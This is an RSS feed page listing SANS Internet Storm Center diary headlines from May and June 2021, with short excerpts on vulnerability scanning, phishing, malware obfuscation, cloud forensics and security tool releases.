FreshRSS

πŸ”’
β–³ πŸ”ƒ
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

DIY CD/DVD Destruction, (Sun, Jun 27th)

June 27th 2021 at 19:14
I have some personal CDs & DVDs to dispose of. And I don't want them to reamain (easily) readable.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th)

June 26th 2021 at 10:13
This XML External Entity injection (XXE) vulnerability disclosed in March 2019 is still actively scanned for a vulnerable mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. This exploit attempts to read the Zimbra configuration file that contains an LDAP password for the zimbra account.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Is this traffic bAD?, (Fri, Jun 25th)

June 25th 2021 at 00:45
It seems like every time I take a handler shift lately, I'm talking about an uptick of traffic on another port and I'm not breaking that trend today. This really takes me back to the early days of the Internet Storm Center when that seemed to be the main thing we talked about. This time, the port that gotmy attention is UDP port 389. This is the normal port for the Lightweight Directory Access Protocol (LDAP) which is used a great deal by Microsoft Active Directory (AD).Β 
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Do you Like Cookies? Some are for sale!, (Thu, Jun 24th)

June 24th 2021 at 05:33
Cookies… These small pieces of information are always with us. Since the GDPR was kicked off in Europe, we are flooded by pop-ups asking if we accept β€œcookies”. Honestly, most people don’t take time to read the warning and just accept the default settings.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Standing With Security Researchers Against Misuse of the DMCA, (Wed, Jun 23rd)

June 23rd 2021 at 15:56
As Dean of Research for our graduate school (sans.edu), I often assist students in developing their research ideas. The research conducted by our students is valuable and important to defend our networks against highly organized and well-funded threat actors. Any restriction on our student's ability to conduct their research, and sharing their results freely, only adds additional unnecessary burdens on us as network defenders. With that, I am happy that I was able to co-sign the attached statement by the Electronic Frontier Foundation (EFF) on behalf of the SANS Technology Institute. Legal threats against good faith security researchers only discourage the open exchange of ideas. If we hope to have a chance to defend, we will have to keep exchanging these ideas, learn and we need to continue to be curious hackers exploring the technologies that are the foundation of our everyday living.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Phishing asking recipients not to report abuse, (Tue, Jun 22nd)

June 22nd 2021 at 13:15
It can be a little disheartening to deal with well-prepared phishing attacks every day, since one can easily see how even users who are fully β€œsecurity-aware” could fall for some them. The messages don’t even have to be too complex to be believable. For example, a message containing seemingly innocuous text and a link that points to legitimate, well-known domain hosting an application that is affected by open redirect vulnerability (I’m looking at you, Google[1], though – to be fair – you’re hardly alone[2]) can look quite trustworthy, if no obvious red flags are present.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Mitre CWE - Common Weakness Enumeration, (Mon, Jun 21st)

June 21st 2021 at 19:10
If you are involved in the security industryΒ  you are at least somewhat familiar with the Mitre ATT&CK framework, the very useful, community driven, knowledgebase of attack threat models and methodologies which can be used to emulate adversary behavior to test security controls. However fewer are aware of a lesserΒ known Mitre project, Common Weakness Enumeration (CWE).
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Video: oledump Cheat Sheet, (Sun, Jun 20th)

June 20th 2021 at 14:59
I did create a SANS cheat sheet for oledump.py.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Easy Access to the NIST RDS Database, (Sat, Jun 19th)

June 19th 2021 at 10:27
When you're facing some suspicious files while performingΒ forensic investigations or analyzing malware components, it's always interesting to know these files areΒ legit or malicious/modified. One of the key sources to verifyΒ hashes is provided by NIST and is called the NSLR project ("National Software Reference Library")[1]. They build "Reference Data Set" (RDS) of information that can be queried to verify a file hash. These RDS are available to download[2] but, as you may expect, there are huge (they are provided as ISO files between 500MB to 4GB!)
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Open redirects ... and why Phishers love them, (Fri, Jun 18th)

June 18th 2021 at 13:03
Working from home, did you get a meeting invite recently that pointed to https://meet.google.com ?Β  Well, that's indeed where Google's online meeting tool is located. But potentially the URL you got is not "only" leading you there.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green


Network Forensics on Azure VMs (Part #2), (Fri, Jun 18th)

June 18th 2021 at 00:28
In yesterday's diary, we took a look at two methods that allow to capture network connection information off a potentially compromised virtual machine in Azure. Today, we'll investigate the most recent addition to the VM monitoring arsenal, namely "Azure Monitor Insights".
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green


 Network Forensics on Azure VMs (Part #1), (Thu, Jun 17th)

June 17th 2021 at 14:40
The tooling to investigate a potentially malicious event on an Azure Cloud VM is still in its infancy. We have covered before (Forensicating Azure VMs) how we can create a snapshot of the OS disk of a running VM. Snapshotting and then killing off the infected VM is very straight forward, but it also tips off an intruder that he has been found out. Sometimes, it makes sense to first watch for a while, and learn more, for example about compromised accounts, lateral movement, or other involved hosts.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more, (Tue, Jun 15th)

June 15th 2021 at 10:16
Vulnerable perimeter devices remain a popular target, and we do see consistent exploit attempts against them. This weekend, Guy wrote about some scans for Fortinet vulnerabilities [1], and Xavier notes that Crowdstrike observed attacks against EoL Sonicwalls [2].Β Starting earlier this month, we did also observe a consistent trickle of requests looking for a relatively recent Sonicwall vulnerability:
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Update: mac-robber.py, (Sun, Jun 13th)

June 13th 2021 at 01:34
Almost 4 years ago, I wrote a python version of mac-robber. I use it fairly regularly at $dayjob. This past week, one of my co-workers was using it, but realized that it hashes large files a little too slowly. He decided to use mac-robber.py to collect the MAC times and do the hashing separately so he could limit the hashes to to files under a certain size. That sounded reasonable, so I've added a switch (-s or --size). If hashing is turned on the new switch will limit the hashing to files under the given size.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Fortinet Targeted for Unpatched SSL VPN Discovery Activity, (Sat, Jun 12th)

June 12th 2021 at 17:32
Over the past 60 days, I have observed scanning activity to discover FortiGate SSL VPN unpatched services. Fortinet has fixed several critical vulnerabilities in SSL VPN and web firewall this year from Remote Code Execution (RCE) to SQL Injection, Denial of Service (DoS) which impact the FortiProxy SSL VPN and FortiWeb Web Application Firewall (WAF) products [1][2]. Two weeks ago, US-CERT [4] released an alert re-iterating that APT actors are looking for Fortinet vulnerabilities to gain access to networks. Additional information to look for signs of this activity available here.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Sonicwall SRA 4600 Targeted By an Old Vulnerability, (Fri, Jun 11th)

June 11th 2021 at 13:55
Devices and applications used to provide remote access are juicy targets. I've already been involved in many ransomware cases and most of the time, the open door was an unpatched VPN device/remote access solution or weak credentials. A good example,Β the recent attack against the Colonial Pipeline that started with a legacy VPN profile[1].
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Keeping an Eye on Dangerous Python Modules, (Fri, Jun 11th)

June 11th 2021 at 05:31
With Python getting more and more popular, especially on Microsoft Operating systems, it's commonΒ to find malicious Python scripts today. I already covered some of them in previous diaries[1][2]. I like this language because it is very powerful: You can automate boring tasks in a few lines. It can be used for offensive as well as defensive purposes, and... it has a lot of 3rd party "modules" or libraries that extend its capabilities. For example, if you would like to use Python for forensics purposes, you can easily access the registry and extract data:
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Are Cookie Banners a Waste of Time or a Complete Waste of Time?, (Thu, May 20th)

June 10th 2021 at 12:08
Legislation, in particular in the European Union, has led to a proliferation of "Cookie Banners." Warning banners that either ask you for blanket permission to set cookies or, in some cases, provide you with some control as to what cookies you do allow. These regulations emerged after advertisers made excessive use of HTTP Cookies to track users across different sites. But in my opinion, these measures are often implemented poorly.Β Changes in browsersΒ have made cookies far less menacing than they have been in the past due to changes made in browsers. Other tracking technologies are bound to replace cookies and, in some cases, already have.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Architecture, compilers and black magic, or "what else affects the ability of AVs to detect malicious files", (Wed, Jun 9th)

June 9th 2021 at 11:23
In my last diary, we went over the impact of different Base encodings on the ability of anti-malware tools to detect malicious code[1]. Since results of our tests showed (among other things) that AV tools in general still struggle significantly more with detecting 64-bit malicious code then 32-bit malicious code, I thought it might be interesting to discuss another factor that might impact the ability of AVs to detect malware – specifically the choice of a compiler.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Microsoft June 2021 Patch Tuesday, (Tue, Jun 8th)

June 8th 2021 at 17:57
This month we got patches for 50 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed and 6 is already being exploited according to Microsoft.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Amazon Sidewalk: Cutting Through the Hype, (Mon, Jun 7th)

June 7th 2021 at 19:22
Later this week (tomorrow?), Amazon will enable its new Sidewalk feature. The feature has already gotten a lot of bad press. Much of this comes from the fact that existing devices are automatically used as Sidewalk Gateways, and users will have to opt out. New devices may require a specific opt-in during setup.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Strange goings on with port 37, (Thu, Jun 3rd)

June 5th 2021 at 02:45
Similar to Yee Ching's diary on Thursday, I noticed an oddity in the Dshield data last weekend (which I had hoped to discuss in a diary on Wednesday, but life got in the way)Β and thought it was worth asking around to see if anyone knows what is going on. As soon as I saw it, I reconfigured my honeypots to try to capture the traffic, but wasn't able to. I'm always very interested when I see some of the legacy ports and protocols pop up. In this case, %%port:37%% is the time protocol which operates on both TCP and UDP and is one of the many services that frequently ran on the low ports of Unix machines I administered back in the 1980s and 1990s. In recent years, most operating systems have disabled these services since they only seemed to be used for DDoS purposes. On Thursday, I took another look at the graph.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Russian Dolls VBS Obfuscation, (Fri, Jun 4th)

June 4th 2021 at 05:01
We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat! Henry's sample was delivered in a password-protected ZIP archive and the file was a VBS script calledΒ "presentation_37142.vbs" (SHA256:2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file on MalwareBazaar[1].
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

DShield Data Analysis: Taking a Look at Port 45740 Activity, (Thu, Jun 3rd)

June 3rd 2021 at 07:00
At the SANS Internet Storm Center (ISC), handlers frequently analyze data submitted from DShield participants to determine activity trends and potential attacks. A few days ago on May 31st, I observed a small anomaly for %%port:45740%% and decided to monitor it for the next 3 days or so. There was a huge spike in number of sources/day and reports/day recorded on May 31st as shown in Figure 1.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Wireshark 3.4.6 (and 3.2.14) released, (Wed, Jun 2nd)

June 2nd 2021 at 20:15
A new version of wireshark is out, a couple of bugfixes including a QUIC TLK decryption issue. Also, the Windows version now comes with npcap 1.31 (updated from 1.10).
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Quick and dirty Python: nmap, (Mon, May 31st)

May 31st 2021 at 19:20
Continuing on from theΒ "Quick and dirty Python: masscan"Β diary,Β which implemented a simple port scanner in Python using masscan to detect web instances on TCP ports 80 or 443.Β  Masscan is perfectly good as a blunt instrument to quickly find open TCP ports across large address spaces, but for fine details it is better to use a scanner like nmap that, while much slower, is able to probe the port to get a better idea of what is running.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green


Video: Cobalt Strike & DNS - Part 1, (Sun, May 30th)

May 30th 2021 at 16:48
One of the Cobalt Strike servers reported by Brad Duncan also communicates over DNS.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Sysinternals: Procmon, Sysmon, TcpView and Process Explorer update, (Sun, May 30th)

May 30th 2021 at 10:55
New versions of Sysinternals' tools Procmon, Sysmon, TcpView and Process Explorer were released.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

YARA Release v4.1.1, (Sun, May 30th)

May 30th 2021 at 10:44
YARA version 4.1.1 was released.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Spear-phishing Email Targeting Outlook Mail Clients , (Sat, May 29th)

May 29th 2021 at 17:18
In February I posted about spam pretending to be an Outlook Version update [1] and now for the past several weeks I have been receiving spear-phishing emails that pretend to be coming from Microsoft Outlook to "Sign in to verify" my account, new terms of services, new version, etc. There also have been some reports this week about large ongoing spear-phishing campaign [2][3] worth reading. Here are some samples which always include a sense of urgency to login as soon as possible:
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Malicious PowerShell Hosted on script.google.com, (Fri, May 28th)

May 28th 2021 at 05:37
Google has an incredible portfolio of services. Besides the classic ones, there are less known services and... they could be very useful for attackers too. One of them is Google Apps Script[1]. Google describes it like this:
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

All your Base are...nearly equal when it comes to AV evasion, but 64-bit executables are not, (Thu, May 27th)

May 27th 2021 at 09:28
Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention and in the case of malware, it has lead its authors to devise some very interesting ways to hide from detection over the years – from encoding of executable files into valid bitmap images[1] to multi-stage encryption of malicious payloads[2] and much further. Many of these techniques continue to be used efectively in the wild by malicious actors as well as by red teams that emulate them. Probably none of these techniques (perhaps with the exception of simple XOR encryption) has been used so widely as Base64 encoding of malicious payloads.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

A Survey of Bluetooth Vulnerabilities Trends, (Wed, May 26th)

May 26th 2021 at 00:51
As usage of fitness trackers, wireless headsets and smart home devices become increasingly popular in our daily lives, a growing reliance on the Bluetooth protocol is expected as it serves as the main medium of communication between devices. Amidst the COVID-19 pandemic, Bluetooth-enabled devices such as phones and hardware tokens were also used for contact-tracing purposes in countries such as Singapore [1]. Currently, the core specification of Bluetooth is 5.2 [2], and are generally divided into 2 categories – Bluetooth Low Energy (BLE) and Bluetooth Classic [3]. Given the increasing popularity and usage of Bluetooth, I started to wonder about the trend of Bluetooth related vulnerabilities.
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

VMware Security Advisory VMSA-2021-0010, (Tue, May 25th)

May 25th 2021 at 18:05
VMware has issued a critical security advisory VMSA-2021-0010 (CVSSv3 score ranging from 6.5-9.8). The products affected are VMware vCenter Server and VMware Cloud Foundation, and addresses CVE-2021-21985 and CVE-2021-21986 [1].
☐ β˜† βœ‡ SANS Internet Storm Center, InfoCON: green

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit, (Tue, May 25th)

May 25th 2021 at 08:12
Today’s diary features a tip-off by one of our ISC diary readers Earl. Earl discovered some dodgy domains within the IP address block of 95.181.152.0/24 via the Hurricane Electric’s BGP Toolkit [1]. A look at the output of the IP address block of 95.181.152.0/24 showed a variety of domains that were related to popular sites such as Steam, Epic Games and Instagram, albeit with an assortment of misspelled URLs.
❌